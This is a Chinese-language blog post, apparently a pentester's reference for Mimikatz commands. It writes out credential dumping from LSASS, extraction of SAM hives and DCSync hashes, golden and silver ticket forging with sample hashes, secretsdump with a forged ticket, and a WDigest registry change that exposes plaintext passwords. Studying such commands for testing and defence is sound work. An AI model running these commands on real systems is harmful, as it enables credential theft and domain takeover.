以肉去蚁蚁愈多,以鱼驱蝇蝇愈至。

导航


1、工具介绍

Mimikatz 是一款由法国安全研究员 Benjamin Delpy 编写的 Windows 安全工具,在渗透测试中被广泛用于密码提取、Kerberos 攻击、票据伪造、LSA dump 等工作。

2、基本用法

2.1、执行方式

Mimikatz 支持两种方式去执行命令,分别是:交互式、脚本式。虽然交互式中的命令总是可以转换为脚本式去执行,但也存在一些命令只能在交互式中去执行,而无法通过脚本式去执行。例如:金票伪造注入命令 Kerberos::golden ... /ptt 只能在交互式下执行,以脚本式执行时会报错运行失败。

(1)命令交互式执行如下:

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
exit

(2)命令脚本式执行如下:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > pssword.txt

2.2、帮助命令

Mimikatz 内置的命令帮助手册并不好用,一些时候还是需要参考官方手册,尽管官方手册也并不太全面。

命令 :: 可查看 mimikatz 内置的模块列表:

mimikatz # ::
ERROR mimikatz_doLocal ; "" module not found ! standard - Standard module [Basic commands (does not require module name)]
crypto - Crypto Module
sekurlsa - SekurLSA module [Some commands to enumerate credentials...]
kerberos - Kerberos package module []
privilege - Privilege module
process - Process module
service - Service module
lsadump - LsaDump module
ts - Terminal Server module
event - Event module
misc - Miscellaneous module
token - Token manipulation module
......

命令 privilege:: 可查看 privilege 模块内置的子命令:

mimikatz # privilege::
ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found ! Module : privilege
Full name : Privilege module debug - Ask debug privilege
driver - Ask load driver privilege
security - Ask security privilege
tcb - Ask tcb privilege
backup - Ask backup privilege
restore - Ask restore privilege
sysenv - Ask system environment privilege
id - Ask a privilege by its id
name - Ask a privilege by its name

暂无命令可查看模块子命令的参数选项,只能参考那描述并不完整的官方手册

3、模块用法

3.1、Standard 模块

(1)日志记录

log c:\tmp\mimikatz.log

命令说明:与 mimikatz 交互所产生的信息全部被记录到一个指定文件中。

(2)mimikatz 版本查看

version
:: 本文所有命令均基于 mimikatz 2.2.0

3.2、Privilege 模块

(1)开启 SeDebugPrivilege 特权。

privilege::debug

privilege::name SeDebugPrivilege

privilege::id 20

::以上三条命令等效。

命令说明:确保那些需要高权限才能操作内存的模块命令在使用时能够被顺利执行。

注:通常情况下,用户只对属于自己的进程有调试权限,但如果该用户被赋予了 SeDebugPrivilege 特权时,该用户就拥有了调试其他用户进程的权限,此时就可以对一些高权限进程执行操作。

此外,在 Privilege 模块中,该特权是使用最多的一个特权,其它特权均很冷门。

3.3、Token 模块

(1)模拟身份

token::elevate 'NT AUTHORITY\SYSTEM'

::模拟成功时,通过 token::whoami 可以看到包含 'NT AUTHORITY\SYSTEM' 或 'Impersonation (Delegation)' 的信息,而默认情况下是不包含的。

命令说明:让当前 Mimikatz 进程“伪装”成 SYSTEM 权限的用户。然后,那些需要读取像如 SAM/SYSTEM 这类的文件/注册表的模块命令才能被顺利运行。

注:SAM/SYSTEM 是 windows 中保护最严密的注册表区域之一,仅 SYSTEM 用户可以访问。因此,即便 mimikatz.exe 是通过管理员身份运行的,其模块命令 lsadump::sam 也无法获取到关键的哈希信息,此时便只有提升到 SYSTEM 权限了。

(2)查看身份

token::whoami

(3)归还身份

token::revert

3.4、SekurLSA 模块

(1)从 LSASS 进程中提取当前已认证过的凭据

sekurlsa::logonPasswords

命令说明:从进程中提取所有有效的凭证。也就是说,可以在域主机上提取到在本机登录或在本地运行的服务上的域用户凭证。甚至有时候还能提取到明文密码。

3.5、LsaDump 模块

(1)本地提取 SAM 用户的哈希信息

lsadump::sam

(2)离线提取 SAM 用户的哈希信息

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

(3)提取域用户的哈希信息

lsadump::lsa /patch
::以简洁的方式批量输出 lsadump::lsa /patch /name:krbtgt
::以简洁的方式指定用户名输出 lsadump::lsa /patch /id:500
::以简洁的方式指定用户 id 输出 lsadump::lsa /inject /name:krbtgt
::以详细的方式指定用户名输出

(4)提取域用户的哈希信息

lsadump::dcsync /user:krbtgt
::提取指定域用户的信息 lsadump::dcsync /all
::提取所有域用户的信息

命令说明:该命令与 lsadump::lsa /inject /name:krbtgt 输出的内容基本相似。区别在于:该命令只能在域环境下使用,工作组环境下不可用。

3.6、Kerberos 模块

(1)查看/导出当前已缓存票据

kerberos::list

kerberos::list /export

命令说明:直接导出 DC 中现有的票据进行使用,省去了金银票据伪造的繁琐过程。

(2)金票伪造

kerberos::golden /user:administrator /domain:skylark.com /sid:S-1-5-21-1869548389-852568882-3188983647 /krbtgt:e6b43234ea2ce6d8bafa4b17c7b3790f /id:500

注:选项 /id 省略的情况下,默认值是 500,即代表 administrator 用户。

(3)银票伪造

kerberos::golden /user:administrator /domain:skylark.com /sid:S-1-5-21-1869548389-852568882-3188983647 /rc4:d5025b8cfb84a5e0ceb443ebd3b2294a /target:dc2012.skylark.com /service:cifs

注:与伪造金票不同之处在于:它的哈希选项是 /rc4 ,即 NTLM 类型的哈希。并且还额外增加了 /target /service 选项,这两选项是必须的。

(4)金/银票据攻击

export KRB5CCNAME=administrator.kirbi

impacket-secretsdump -k -no-pass administrator@dc2012.skylark.com -dc-ip 192.168.56.50 -target-ip 192.168.56.50
#票据的使用通过 impacket 套件中的工具使用效果最好。另外不管是金票还是银票,均可以使用此命令进行连接。

3.7、Misc 模块

(1)调出 cmd shell

misc::cmd

命令说明:在进行金票攻击或哈希传递攻击时可能需要用到。

(2)监听剪贴板

misc::clip

命令说明:暂无发现可用之处,留待观察。

4、杂项

(1)在高版本 Windows 系统中(win 8.1 以上,这意味着 win 7/xp 还是可以直接读明文密码。)无法利用 Mimikatz 命令 sekurlsa::logonpasswords 直接读取明文密码。这是因为微软默认关闭了 wdigest 注册表键,而如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。【开启命令:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

(2)Mimikatz 的大多数模块命令如果执行不成功,那基本都是权限问题。所以只要确保 privilege::debugtoken::elevate 'NT AUTHORITY\SYSTEM' 可以正常执行,那么基本上所有命令均可顺利执行。

Mimikatz 常用命令的更多相关文章

  1. mimikaz常用命令

    常用命令,留着自己使用的时候方便查找 mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获 ...

  2. Linux 常用命令(持续补充)

    常用命令: command &:将进程放在后台执行 ctrl + z:暂停当前进程 并放入后台 jobs:查看当前后台任务 bg( %id):将任务转为后台执行 fg( %id):将任务调回前 ...

  3. LVM基本介绍与常用命令

    一.LVM介绍LVM是 Logical Volume Manager(逻辑卷管理)的简写,它是Linux环境下对磁盘分区进行管理的一种机制LVM - 优点:LVM通常用于装备大量磁盘的系统,但它同样适 ...

  4. Linux学习笔记(一):常用命令

    经过统计Linux中能够识别的命令超过3000种,当然常用的命令就远远没有这么多了,按照我的习惯,我把已经学过的Linux常用命令做了以下几个方面的分割: 1.文件处理命令 2.文件搜索命令 3.帮助 ...

  5. git常用命令(持续更新中)

    git常用命令(持续更新中) 本地仓库操作git int                                 初始化本地仓库git add .                       ...

  6. 【原】npm 常用命令详解

    今年上半年在学习gulp的使用,对npm的掌握是必不可少的,经常到npm官网查询文档让我感到不爽,还不如整理了一些常用的命令到自己博客上,于是根据自己的理解简单翻译过来,终于有点输出,想学习npm这块 ...

  7. npm常用命令

    npm常用命令 环境:win7 npm 是什么 NPM(node package manager),通常称为node包管理器.顾名思义,它的主要功能就是管理node包,包括:安装.卸载.更新.查看.搜 ...

  8. Git 常用命令

    一.初始環境配置 git config --global user.name "John Doe"git config --global user.email johndoe@ex ...

  9. linux iptables常用命令之配置生产环境iptables及优化

    在了解iptables的详细原理之前,我们先来看下如何使用iptables,以终为始,有可能会让你对iptables了解更深 所以接下来我们以配置一个生产环境下的iptables为例来讲讲它的常用命令 ...

  10. Linux常用命令(一)

    Linux常用命令 1. pwd查看当前路径(Print Working Directory)    [root@CentOS ~]# pwd/root 2. cd .. 返回上一级 .. 表示上一级 ...

随机推荐

  1. JS代码执行

  2. TypeError: 'NoneType' object is not iterable 一次错误场景

    TypeError: 'NoneType' object is not iterable 源码 def get_url(lines): urls=[] for line in lines: if 'i ...

  3. 基于近红外与可见光双目摄像头的活体人脸检测,文末附Demo

    基于近红外与可见光双目摄像头的活体人脸检测原理 人脸活体检测(Face Anti-Spoofing)是人脸识别系统中的重要一环,它负责验证捕捉到的人脸是否为真实活体,以抵御各种伪造攻击,如彩色纸张打印 ...

  4. DB读写分离情况下,如何解决缓存和数据库不一致性问题?

    前言 在读写分离的情况下,缓存和数据库数据不一致怎么解决? 请看这一篇如何更新缓存保证缓存和数据库双写一致性? 如何解决DB数据库的数据不一致问题? 请看这一篇怎么解决DB读写分离,导致数据不一致问题 ...

  5. 解决 Docker 日志文件太大的问题

    Docker 在不重建容器的情况下,日志文件默认会一直追加,时间一长会逐渐占满服务器的硬盘的空间,内存消耗也会一直增加,本篇来了解一些控制日志文件的方法. 清理单个文件 运行时控制 全局配置 Dock ...

  6. Windows 提权-服务_弱注册表权限

    本文通过 Google 翻译 Weak Registry Key Permissions – Windows Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭 ...

  7. 实现领域驱动设计 - 使用ABP框架 - 聚合

    这是本指南的关键部分.我们将通过实例介绍和解释一些明确的规则.在实现领域驱动设计时,您可以遵循这些规则并将其应用到您的解决方案中 领域案例 这些例子将使用GitHub中使用的一些概念,比如Issue, ...

  8. Golang 301永久重定向

    比如我要把www.taadis.com永久重定向到taadis.com //main.go package main import ( "log" "net/http&q ...

  9. 使用Python可视化洛伦兹变换

    引言 大家好!今天我们将探讨一个非常有趣且重要的物理概念-洛伦兹变换.它是相对论的核心内容之一,描述了在高速运动下,时间.长度以及其他物理量是如何发生变化的.通过使用 Python 进行可视化,我们不 ...

  10. RSA 加密及一些攻击方式

    本文章转载自个人博客seandictionary.top同步更新可能不及时 原理 随机生成两个素数,p , q 令n = p*q 由欧拉公式计算出φ(n) = (p-1)(q-1) 规定e,使得e满足 ...